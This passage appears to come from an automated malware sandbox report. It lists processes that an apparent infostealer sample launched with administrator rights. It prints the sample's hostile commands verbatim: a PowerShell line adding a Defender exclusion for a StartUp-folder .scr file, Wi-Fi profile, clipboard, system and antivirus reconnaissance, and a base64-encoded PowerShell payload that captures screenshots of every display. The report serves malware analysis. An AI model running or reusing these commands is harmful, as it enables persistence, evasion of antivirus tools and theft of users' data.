                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:15
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tasklist.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:tasklist /FO LIST
                                                          Imagebase:0x7ff6776c0000
                                                          File size:106'496 bytes
                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tasklist.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:tasklist /FO LIST
                                                          Imagebase:0x7ff6776c0000
                                                          File size:106'496 bytes
                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:19:36:12
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:23
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:24
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:25
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:26
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:27
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:28
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:29
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:30
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Get-Clipboard
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:31
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:32
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                          Imagebase:0x7ff748a90000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:33
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\systeminfo.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:systeminfo
                                                          Imagebase:0x7ff6fbb50000
                                                          File size:110'080 bytes
                                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:34
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\netsh.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:netsh wlan show profile
                                                          Imagebase:0x7ff755090000
                                                          File size:96'768 bytes
                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:35
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tasklist.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:tasklist /FO LIST
                                                          Imagebase:0x7ff6776c0000
                                                          File size:106'496 bytes
                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:36
                                                          Start time:19:36:15
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:38
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:39
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:40
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:41
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:42
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:43
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\getmac.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:getmac
                                                          Imagebase:0x7ff7be5d0000
                                                          File size:90'112 bytes
                                                          MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:44
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
                                                          Commandline:tree /A /F
                                                          Imagebase:0x7ff6ec980000
                                                          File size:20'992 bytes
                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:45
                                                          Start time:19:36:17
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGU